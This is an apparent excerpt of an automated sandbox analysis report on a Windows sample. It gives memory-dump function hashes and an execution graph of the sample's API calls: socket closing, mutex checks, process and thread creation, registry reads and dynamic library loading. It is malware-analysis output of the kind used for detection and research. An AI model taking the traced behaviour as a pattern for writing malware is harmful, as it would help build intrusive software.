                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aba1868876b1336652fb450289ff59d9d9b333e912aff2165d135c8b1cc47e45
                                • Instruction ID: dcfec20effb8ac874227dc79a772493e525b9798d0b6fafb1e37a27187aaf1b3
                                • Opcode Fuzzy Hash: aba1868876b1336652fb450289ff59d9d9b333e912aff2165d135c8b1cc47e45
                                • Instruction Fuzzy Hash: E3F01DF0D1421A9FEB54DFA9C856BAEBFF4AB08300F00895AD918E7241EB748604CF91
                                Function 07353D21 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: afc85b0207473663bd707acbdd15ae03f5958bad489a1377d3e480925a05605c
                                • Instruction ID: a20826ebb84e51e5051fbdeb518b10b370a8a66e58fd0b0557166fd534b63251
                                • Opcode Fuzzy Hash: afc85b0207473663bd707acbdd15ae03f5958bad489a1377d3e480925a05605c
                                • Instruction Fuzzy Hash: A1F0BEB48146899FCB55CFA8C485BADBFF0AF06318F0485EAC818A72A2CB304601CB40
                                Function 07358688 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4d92f8891fbb158ee5144b5077c4eee6324a8dea4fbc2e76335650681c2f0e4
                                • Instruction ID: 706692a67884a84fd8a272ae467f6e55dcd2626c06fd1238eb004b0d1f6e2e8b
                                • Opcode Fuzzy Hash: a4d92f8891fbb158ee5144b5077c4eee6324a8dea4fbc2e76335650681c2f0e4
                                • Instruction Fuzzy Hash: B5F0C9B4D14208EFDB50DFB8D545AADBFF4AB09201F1086AAD849E3200E7349A44DF41
                                Function 0735E6C0 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc68fe7062438d8a4839e0bb178a2f3fd56ad0254a828e88a3536315937025a1
                                • Instruction ID: 4be3a88377a02821ef7fb4784eb82194df4a6b219f80c208b66eb97d96c2a22c
                                • Opcode Fuzzy Hash: bc68fe7062438d8a4839e0bb178a2f3fd56ad0254a828e88a3536315937025a1
                                • Instruction Fuzzy Hash: 79F0A0F1914248CFE7109BAAE808BAD7EBD9B8A340F40C1219C0A6A685DE701A05CE22
                                Function 07354E90 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52bc6cbb672c3283246c3b36d76afe7d5ab7f62ef1333ae80da1abe33a205c59
                                • Instruction ID: a0a5c20f2a2f85c820f53327f7728e7b8f28961e414b660bb7ad378824593632
                                • Opcode Fuzzy Hash: 52bc6cbb672c3283246c3b36d76afe7d5ab7f62ef1333ae80da1abe33a205c59
                                • Instruction Fuzzy Hash: CDE0C2F080124CDBEB04EFB0D404AAD7BF8AB01204F5005A9CC0953340DB340E88E782
                                Function 07358380 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2e9da87a3890ba3870d43eec6296d2b04ee05146535f739fb1c00c3c7c5722ef
                                • Instruction ID: 490c67b4b19d00f99db8c77762a17dd1cf6eb8350e1ca1ab2fe7aec1f20acd96
                                • Opcode Fuzzy Hash: 2e9da87a3890ba3870d43eec6296d2b04ee05146535f739fb1c00c3c7c5722ef
                                • Instruction Fuzzy Hash: 8BE0D8B1A54646CFD700CF79C905A8ABFF0AF04324F64C199D435D72E2E77A45058F40
                                Function 07358390 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88f47cc78c6943eeea5669c35b32de5d52493ed2f6d512966cef3dde1b873b01
                                • Instruction ID: 6dfe5401a5a5eabb2b4fe30302bd1c52ffe9ea535b01f9743452996ac5681d12
                                • Opcode Fuzzy Hash: 88f47cc78c6943eeea5669c35b32de5d52493ed2f6d512966cef3dde1b873b01
                                • Instruction Fuzzy Hash: FEE0B6F4E54209DFD740EFB9C905A9EBBF4BF08200F1185A9D419E7251E7B596048F91
                                Function 07355FBD Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e4e95d31fc772668461297cf6f9674c8a9832ae534ecdcfa91aebf0274fc70f
                                • Instruction ID: 701ef1b1d914cc1c3f87d7133ba0ddf6affbc443195816c2d7e34448bcd0e392
                                • Opcode Fuzzy Hash: 4e4e95d31fc772668461297cf6f9674c8a9832ae534ecdcfa91aebf0274fc70f
                                • Instruction Fuzzy Hash: D2D0C2B3C001258BCB20AFE8AD055EFFF34AF05620B414216E911AB550D3300620CBC0
                                Function 07355FC8 Relevance: .0, Instructions: 16COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction ID: d7d6617310828fde546bdeeefdf4b623536e2e77ab71d0b0e628a64dd4077659
                                • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                • Instruction Fuzzy Hash: BDD09EB2D40139E78B10AFE9DC058DFFF79EF05650F418126E915A7100D3715A21DBD1
                                Function 0735A6BC Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 95d047af0c83dec0c81391c8593aac41a729fa7b6896b3bf663b4edd83a5e32c
                                • Instruction ID: b49558546daad129e658c821658147a98f209701d5158bee6bab0c3ffd92ff73
                                • Opcode Fuzzy Hash: 95d047af0c83dec0c81391c8593aac41a729fa7b6896b3bf663b4edd83a5e32c
                                • Instruction Fuzzy Hash: 38D0A77091521CCFEB10CB00E840BDCBB7AFB8A210F0082D5D00D93500CB701E889F51
                                Function 07358488 Relevance: .0, Instructions: 14COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 216f6c36e53ac6c38e844b3c3927887a66a5b93e2e2f9ae608582f177187dc98
                                • Instruction ID: 988296c7bb4e7b036c974151fbeba5feb7e0a7f214c593d9f3ad51d7ccada1da
                                • Opcode Fuzzy Hash: 216f6c36e53ac6c38e844b3c3927887a66a5b93e2e2f9ae608582f177187dc98
                                • Instruction Fuzzy Hash: ABD012722141089E6B51EE95FC40C5277ECBB147007408822ED0CCB131E631E434D791
                                Function 0735A420 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a5c9662e0cab4f51e30e038b906833da209c7054e87fa8ac1f5922ed90a9dab
                                • Instruction ID: 42bfc0551f65a9877ba68b8df2bbe46c7b124d741c5c2665bbf137aa2d00b4e3
                                • Opcode Fuzzy Hash: 0a5c9662e0cab4f51e30e038b906833da209c7054e87fa8ac1f5922ed90a9dab
                                • Instruction Fuzzy Hash: E2D0A7B20147444FD341AB95A40E2253F746B02301F4440A6FC4C45562DFA44818DB12
                                Function 073555D0 Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28a975d12ca98c6652fd6868ada04c0bf1f8e64b8a0f50a7754874bd4684c05f
                                • Instruction ID: 605de658b9037fc507c233f8149740c7f7149fccbad212ef4b175527f6b96780
                                • Opcode Fuzzy Hash: 28a975d12ca98c6652fd6868ada04c0bf1f8e64b8a0f50a7754874bd4684c05f
                                • Instruction Fuzzy Hash: 8DC08C62028DC04EF31AA7208C1EF987F40FB66324F15CB83D4C5488F1DB2D445AE706
                                Function 0735A430 Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f02ca06828eeedd61c91c8a7e24d578c3c727df63cf53d1dce69e39679162b3
                                • Instruction ID: 44d3b4f951b2cd8ab36269803ee8b758162a1d00981e4728ba07c78c226b13d0
                                • Opcode Fuzzy Hash: 6f02ca06828eeedd61c91c8a7e24d578c3c727df63cf53d1dce69e39679162b3
                                • Instruction Fuzzy Hash: 38C08CB1020A088FD2006B96F80F7283FF86702302F800022F80C019118FB01408EE5A
                                Function 073558E4 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1386184542.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_7350000_xASiLfzXONGIW.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 08029a34fb939c4ef7827255e7f951b6426730a6defb3a4f90d491d189b90e84
                                • Instruction ID: 4ba0d2d9a367c9427718fe8d474caa5207daa6138d5e26c5a3f3c9c99ae24108
                                • Opcode Fuzzy Hash: 08029a34fb939c4ef7827255e7f951b6426730a6defb3a4f90d491d189b90e84
                                • Instruction Fuzzy Hash: 86B092E5169200A6780062A44890F2F9492BBB2710B808805260A0200089A054A4936B

                                Execution Graph

                                Execution Coverage:1.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:3.5%
                                Total number of Nodes:654
                                Total number of Limit Nodes:13
                                execution_graph 45774 404e06 WaitForSingleObject 45775 404e20 SetEvent CloseHandle 45774->45775 45776 404e37 closesocket 45774->45776 45777 404eb8 45775->45777 45778 404e44 45776->45778 45779 404e5a 45778->45779 45787 4050c4 83 API calls 45778->45787 45781 404e6c WaitForSingleObject 45779->45781 45782 404eae SetEvent CloseHandle 45779->45782 45788 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45781->45788 45782->45777 45784 404e7b SetEvent WaitForSingleObject 45789 41c4c6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 45784->45789 45786 404e93 SetEvent CloseHandle CloseHandle 45786->45782 45787->45779 45788->45784 45789->45786 45790 40163e 45791 401646 45790->45791 45792 401649 45790->45792 45793 401688 45792->45793 45795 401676 45792->45795 45798 43229f 45793->45798 45797 43229f new 22 API calls 45795->45797 45796 40167c 45797->45796 45802 4322a4 45798->45802 45800 4322d0 45800->45796 45802->45800 45805 439adb 45802->45805 45812 440480 7 API calls 2 library calls 45802->45812 45813 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45802->45813 45814 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 45802->45814 45810 443649 ___crtLCMapStringA 45805->45810 45806 443687 45816 43ad91 20 API calls __dosmaperr 45806->45816 45808 443672 RtlAllocateHeap 45809 443685 45808->45809 45808->45810 45809->45802 45810->45806 45810->45808 45815 440480 7 API calls 2 library calls 45810->45815 45812->45802 45815->45810 45816->45809 45817 43263c 45818 432648 CallCatchBlock 45817->45818 45843 43234b 45818->45843 45820 43264f 45822 432678 45820->45822 46107 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 45820->46107 45827 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 45822->45827 46108 441763 5 API calls _ValidateLocalCookies 45822->46108 45824 432691 45826 432697 CallCatchBlock 45824->45826 46109 441707 5 API calls _ValidateLocalCookies 45824->46109 45833 432717 45827->45833 46110 4408e7 35 API calls 5 library calls 45827->46110 45854 4328c9 45833->45854 45838 432743 45840 43274c 45838->45840 46111 4408c2 28 API calls _Atexit 45838->46111 46112 4324c2 13 API calls 2 library calls 45840->46112 45844 432354 45843->45844 46113 4329da IsProcessorFeaturePresent 45844->46113 45846 432360 46114 436cd1 10 API calls 4 library calls 45846->46114 45848 432365 45853 432369 45848->45853 46115 4415bf 45848->46115 45851 432380 45851->45820 45853->45820 46181 434c30 45854->46181 45857 43271d 45858 4416b4 45857->45858 46183 44c239 45858->46183 45860 432726 45863 40d3f0 45860->45863 45861 4416bd 45861->45860 46187 443d25 35 API calls 45861->46187 46189 41a8da LoadLibraryA GetProcAddress 45863->46189 45865 40d40c 46196 40dd83 45865->46196 45867 40d415 46211 4020d6 45867->46211 45870 4020d6 28 API calls 45871 40d433 45870->45871 46217 419d87 45871->46217 45875 40d445 46243 401e6d 45875->46243 45877 40d44e 45878 40d461 45877->45878 45879 40d4b8 45877->45879 46249 40e609 45878->46249 45880 401e45 22 API calls 45879->45880 45882 40d4c6 45880->45882 45886 401e45 22 API calls 45882->45886 45885 40d47f 46264 40f98d 45885->46264 45887 40d4e5 45886->45887 46280 4052fe 45887->46280 45891 40d4f4 46285 408209 45891->46285 45899 40d4a3 45901 401fb8 11 API calls 45899->45901 45903 40d4ac 45901->45903 46102 4407f6 GetModuleHandleW 45903->46102 45904 401fb8 11 API calls 45905 40d520 45904->45905 45906 401e45 22 API calls 45905->45906 45907 40d529 45906->45907 46302 401fa0 45907->46302 45909 40d534 45910 401e45 22 API calls 45909->45910 45911 40d54f 45910->45911 45912 401e45 22 API calls 45911->45912 45913 40d569 45912->45913 45914 40d5cf 45913->45914 46306 40822a 28 API calls 45913->46306 45915 401e45 22 API calls 45914->45915 45921 40d5dc 45915->45921 45917 40d594 45918 401fc2 28 API calls 45917->45918 45919 40d5a0 45918->45919 45922 401fb8 11 API calls 45919->45922 45920 40d650 45926 40d660 CreateMutexA GetLastError 45920->45926 45921->45920 45923 401e45 22 API calls 45921->45923 45924 40d5a9 45922->45924 45925 40d5f5 45923->45925 46307 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45924->46307 45929 40d5fc OpenMutexA 45925->45929 45927 40d987 45926->45927 45928 40d67f 45926->45928 45932 401fb8 11 API calls 45927->45932 45971 40d9ec 45927->45971 45930 40d688 45928->45930 45931 40d68a GetModuleFileNameW 45928->45931 45935 40d622 45929->45935 45936 40d60f WaitForSingleObject CloseHandle 45929->45936 45930->45931 46310 4192ae 33 API calls 45931->46310 45956 40d99a ___scrt_fastfail 45932->45956 45934 40d5c5 45934->45914 45938 40dd0f 45934->45938 46308 411f34 RegOpenKeyExA RegQueryValueExA RegCloseKey 45935->46308 45936->45935 46340 41239a 30 API calls 45938->46340 45939 40d6a0 45940 40d6f5 45939->45940 45942 401e45 22 API calls 45939->45942 45944 401e45 22 API calls 45940->45944 45950 40d6bf 45942->45950 45952 40d720 45944->45952 45945 40dd22 46341 410eda 65 API calls ___scrt_fastfail 45945->46341 45947 40d63b 45947->45920 46309 41239a 30 API calls 45947->46309 45948 40dcfa 45978 40dd6a 45948->45978 46342 402073 28 API calls 45948->46342 45950->45940 45957 40d6f7 45950->45957 45965 40d6db 45950->45965 45951 40d731 45953 401e45 22 API calls 45951->45953 45952->45951 46314 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 45952->46314 45963 40d73a 45953->45963 46322 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 45956->46322 46312 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45957->46312 45958 40dd3a 46343 4052dd 28 API calls 45958->46343 45970 401e45 22 API calls 45963->45970 45965->45940 46311 4067a0 36 API calls ___scrt_fastfail 45965->46311 45967 40d70d 45967->45940 46313 4066a6 58 API calls 45967->46313 45973 40d755 45970->45973 45975 401e45 22 API calls 45971->45975 45980 401e45 22 API calls 45973->45980 45976 40da10 45975->45976 46323 402073 28 API calls 45976->46323 46344 413980 161 API calls 45978->46344 45983 40d76f 45980->45983 45985 401e45 22 API calls 45983->45985 45984 40da22 46324 41215f 14 API calls 45984->46324 45987 40d789 45985->45987 45990 401e45 22 API calls 45987->45990 45988 40da38 45989 401e45 22 API calls 45988->45989 45991 40da44 45989->45991 45994 40d7a3 45990->45994 46325 439867 39 API calls _swprintf 45991->46325 45993 40d810 45993->45956 46000 401e45 22 API calls 45993->46000 46031 40d89f ___scrt_fastfail 45993->46031 45994->45993 45996 401e45 22 API calls 45994->45996 45995 40da51 45997 40da7e 45995->45997 46326 41aa4f 81 API calls ___scrt_fastfail 45995->46326 46005 40d7b8 _wcslen 45996->46005 46327 402073 28 API calls 45997->46327 46001 40d831 46000->46001 46007 401e45 22 API calls 46001->46007 46002 40da70 CreateThread 46002->45997 46597 41b212 10 API calls 46002->46597 46003 40da8d 46328 402073 28 API calls 46003->46328 46005->45993 46011 401e45 22 API calls 46005->46011 46006 40da9c 46329 4194da 79 API calls 46006->46329 46009 40d843 46007->46009 46015 401e45 22 API calls 46009->46015 46010 40daa1 46012 401e45 22 API calls 46010->46012 46013 40d7d3 46011->46013 46014 40daad 46012->46014 46016 401e45 22 API calls 46013->46016 46018 401e45 22 API calls 46014->46018 46017 40d855 46015->46017 46019 40d7e8 46016->46019 46021 401e45 22 API calls 46017->46021 46020 40dabf 46018->46020 46315 40c5ed 31 API calls 46019->46315 46024 401e45 22 API calls 46020->46024 46023 40d87e 46021->46023 46029 401e45 22 API calls 46023->46029 46026 40dad5 46024->46026 46025 40d7fb 46316 401ef3 28 API calls 46025->46316 46033 401e45 22 API calls 46026->46033 46028 40d807 46317 401ee9 11 API calls 46028->46317 46030 40d88f 46029->46030 46318 40b871 46 API calls _wcslen 46030->46318 46319 412338 31 API calls 46031->46319 46034 40daf5 46033->46034 46330 439867 39 API calls _swprintf 46034->46330 46037 40d942 ctype 46040 401e45 22 API calls 46037->46040 46039 40db02 46041 401e45 22 API calls 46039->46041 46044 40d959 46040->46044 46042 40db0d 46041->46042 46043 401e45 22 API calls 46042->46043 46045 40db1e 46043->46045 46044->45971 46046 401e45 22 API calls 46044->46046 46331 408f1f 163 API calls _wcslen 46045->46331 46047 40d976 46046->46047 46320 419bca 28 API calls 46047->46320 46050 40d982 46321 40de34 88 API calls 46050->46321 46051 40db33 46053 401e45 22 API calls 46051->46053 46055 40db3c 46053->46055 46054 40db83 46056 401e45 22 API calls 46054->46056 46055->46054 46057 43229f new 22 API calls 46055->46057 46062 40db91 46056->46062 46058 40db53 46057->46058 46059 401e45 22 API calls 46058->46059 46060 40db65 46059->46060 46064 40db6c CreateThread 46060->46064 46061 40dbd9 46063 401e45 22 API calls 46061->46063 46062->46061 46065 43229f new 22 API calls 46062->46065 46070 40dbe2 46063->46070 46064->46054 46595 417f6a 101 API calls __EH_prolog 46064->46595 46066 40dba5 46065->46066 46067 401e45 22 API calls 46066->46067 46068 40dbb6 46067->46068 46073 40dbbd CreateThread 46068->46073 46069 40dc4c 46071 401e45 22 API calls 46069->46071 46070->46069 46072 401e45 22 API calls 46070->46072 46075 40dc55 46071->46075 46074 40dbfc 46072->46074 46073->46061 46599 417f6a 101 API calls __EH_prolog 46073->46599 46077 401e45 22 API calls 46074->46077 46076 40dc99 46075->46076 46079 401e45 22 API calls 46075->46079 46337 4195f8 79 API calls 46076->46337 46080 40dc11 46077->46080 46082 40dc69 46079->46082 46332 40c5a1 31 API calls 46080->46332 46081 40dca2 46338 401ef3 28 API calls 46081->46338 46087 401e45 22 API calls 46082->46087 46084 40dcad 46339 401ee9 11 API calls 46084->46339 46090 40dc7e 46087->46090 46088 40dc24 46333 401ef3 28 API calls 46088->46333 46089 40dcb6 CreateThread 46095 40dce5 46089->46095 46096 40dcd9 CreateThread 46089->46096 46600 40e18d 121 API calls 46089->46600 46335 439867 39 API calls _swprintf 46090->46335 46092 40dc30 46334 401ee9 11 API calls 46092->46334 46095->45948 46097 40dcee CreateThread 46095->46097 46096->46095 46594 410b5c 137 API calls 46096->46594 46097->45948 46596 411140 38 API calls ___scrt_fastfail 46097->46596 46099 40dc39 CreateThread 46099->46069 46598 401bc9 49 API calls 46099->46598 46100 40dc8b 46336 40b0a3 7 API calls 46100->46336 46103 432739 46102->46103 46103->45838 46104 44091f 46103->46104 46602 44069c 46104->46602 46107->45820 46108->45824 46109->45827 46110->45833 46111->45840 46112->45826 46113->45846 46114->45848 46119 44cd48 46115->46119 46118 436cfa 8 API calls 3 library calls 46118->45853 46122 44cd65 46119->46122 46123 44cd61 46119->46123 46121 432372 46121->45851 46121->46118 46122->46123 46125 4475a6 46122->46125 46137 432d4b 46123->46137 46126 4475b2 CallCatchBlock 46125->46126 46144 442d9a EnterCriticalSection 46126->46144 46128 4475b9 46145 44d363 46128->46145 46130 4475c8 46131 4475d7 46130->46131 46156 44743a 23 API calls 46130->46156 46158 4475f3 LeaveCriticalSection std::_Lockit::~_Lockit 46131->46158 46134 4475e8 CallCatchBlock 46134->46122 46135 4475d2 46157 4474f0 GetStdHandle GetFileType 46135->46157 46138 432d56 IsProcessorFeaturePresent 46137->46138 46139 432d54 46137->46139 46141 432d98 46138->46141 46139->46121 46180 432d5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46141->46180 46143 432e7b 46143->46121 46144->46128 46146 44d36f CallCatchBlock 46145->46146 46147 44d393 46146->46147 46148 44d37c 46146->46148 46159 442d9a EnterCriticalSection 46147->46159 46167 43ad91 20 API calls __dosmaperr 46148->46167 46151 44d3cb 46168 44d3f2 LeaveCriticalSection std::_Lockit::~_Lockit 46151->46168 46152 44d381 _Atexit CallCatchBlock 46152->46130 46153 44d39f 46153->46151 46160 44d2b4 46153->46160 46156->46135 46157->46131 46158->46134 46159->46153 46169 443005 46160->46169 46162 44d2d3 46177 443c92 20 API calls __dosmaperr 46162->46177 46164 44d2c6 46164->46162 46176 445fb3 11 API calls 2 library calls 46164->46176 46165 44d325 46165->46153 46167->46152 46168->46152 46174 443012 ___crtLCMapStringA 46169->46174 46170 443052 46179 43ad91 20 API calls __dosmaperr 46170->46179 46171 44303d RtlAllocateHeap 46172 443050 46171->46172 46171->46174 46172->46164 46174->46170 46174->46171 46178 440480 7 API calls 2 library calls 46174->46178 46176->46164 46177->46165 46178->46174 46179->46172 46180->46143 46182 4328dc GetStartupInfoW 46181->46182 46182->45857 46184 44c24b 46183->46184 46185 44c242 46183->46185 46184->45861 46188 44c138 48 API calls 5 library calls 46185->46188 46187->45861 46188->46184 46190 41a919 LoadLibraryA GetProcAddress 46189->46190 46191 41a909 GetModuleHandleA GetProcAddress 46189->46191 46192 41a947 GetModuleHandleA GetProcAddress 46190->46192 46193 41a937 GetModuleHandleA GetProcAddress 46190->46193 46191->46190 46194 41a973 24 API calls 46192->46194 46195 41a95f GetModuleHandleA GetProcAddress 46192->46195 46193->46192 46194->45865 46195->46194 46345 419493 FindResourceA 46196->46345 46199 439adb ___std_exception_copy 21 API calls 46200 40ddad ctype 46199->46200 46348 402097 46200->46348 46203 401fc2 28 API calls 46204 40ddd3 46203->46204 46205 401fb8 11 API calls 46204->46205 46206 40dddc 46205->46206 46207 439adb ___std_exception_copy 21 API calls 46206->46207 46208 40dded ctype 46207->46208 46354 4062ee 46208->46354 46210 40de20 46210->45867 46212 4020ec 46211->46212 46213 4023ae 11 API calls 46212->46213 46214 402106 46213->46214 46215 402549 28 API calls 46214->46215 46216 402114 46215->46216 46216->45870 46389 4020bf 46217->46389 46219 419d9a 46222 419e0c 46219->46222 46231 401fc2 28 API calls 46219->46231 46234 401fb8 11 API calls 46219->46234 46238 419e0a 46219->46238 46393 404182 28 API calls 46219->46393 46394 41ab9a 46219->46394 46220 401fb8 11 API calls 46221 419e3c 46220->46221 46223 401fb8 11 API calls 46221->46223 46405 404182 28 API calls 46222->46405 46224 419e44 46223->46224 46227 401fb8 11 API calls 46224->46227 46229 40d43c 46227->46229 46228 419e18 46230 401fc2 28 API calls 46228->46230 46239 40e563 46229->46239 46232 419e21 46230->46232 46231->46219 46233 401fb8 11 API calls 46232->46233 46235 419e29 46233->46235 46234->46219 46236 41ab9a 28 API calls 46235->46236 46236->46238 46238->46220 46240 40e56f 46239->46240 46242 40e576 46239->46242 46431 402143 11 API calls 46240->46431 46242->45875 46244 402143 46243->46244 46248 40217f 46244->46248 46432 402710 11 API calls 46244->46432 46246 402164 46433 4026f2 11 API calls std::_Deallocate 46246->46433 46248->45877 46250 40e624 46249->46250 46434 40f57c 46250->46434 46256 40d473 46259 401e45 46256->46259 46257 40e663 46257->46256 46450 40f663 46257->46450 46261 401e4d 46259->46261 46260 401e55 46260->45885 46261->46260 46545 402138 22 API calls 46261->46545 46266 40f997 __EH_prolog 46264->46266 46546 40fcfb 46266->46546 46267 40f663 36 API calls 46268 40fb90 46267->46268 46550 40fce0 46268->46550 46270 40d491 46272 40e5ba 46270->46272 46271 40fa1a 46271->46267 46556 40f4c6 46272->46556 46275 40d49a 46277 40dd70 46275->46277 46276 40f663 36 API calls 46276->46275 46566 40e5da 70 API calls 46277->46566 46279 40dd7b 46281 4020bf 11 API calls 46280->46281 46282 40530a 46281->46282 46567 403280 46282->46567 46284 405326 46284->45891 46572 4051cf 46285->46572 46287 408217 46576 402035 46287->46576 46290 401fc2 46291 401fd1 46290->46291 46298 402019 46290->46298 46292 4023ae 11 API calls 46291->46292 46293 401fda 46292->46293 46294 401ff5 46293->46294 46295 40201c 46293->46295 46591 403078 28 API calls 46294->46591 46296 40265a 11 API calls 46295->46296 46296->46298 46299 401fb8 46298->46299 46300 4023ae 11 API calls 46299->46300 46301 401fc1 46300->46301 46301->45904 46303 401fb2 46302->46303 46304 401fa9 46302->46304 46303->45909 46592 4025c0 28 API calls 46304->46592 46306->45917 46307->45934 46308->45947 46309->45920 46310->45939 46311->45940 46312->45967 46313->45940 46314->45951 46315->46025 46316->46028 46317->45993 46318->46031 46319->46037 46320->46050 46321->45927 46322->45971 46323->45984 46324->45988 46325->45995 46326->46002 46327->46003 46328->46006 46329->46010 46330->46039 46331->46051 46332->46088 46333->46092 46334->46099 46335->46100 46336->46076 46337->46081 46338->46084 46339->46089 46340->45945 46342->45958 46593 418ccd 103 API calls 46344->46593 46346 4194b0 LoadResource LockResource SizeofResource 46345->46346 46347 40dd9e 46345->46347 46346->46347 46347->46199 46349 40209f 46348->46349 46357 4023ae 46349->46357 46351 4020aa 46361 4024ea 46351->46361 46353 4020b9 46353->46203 46355 402097 28 API calls 46354->46355 46356 406302 46355->46356 46356->46210 46358 402408 46357->46358 46359 4023b8 46357->46359 46358->46351 46359->46358 46368 402787 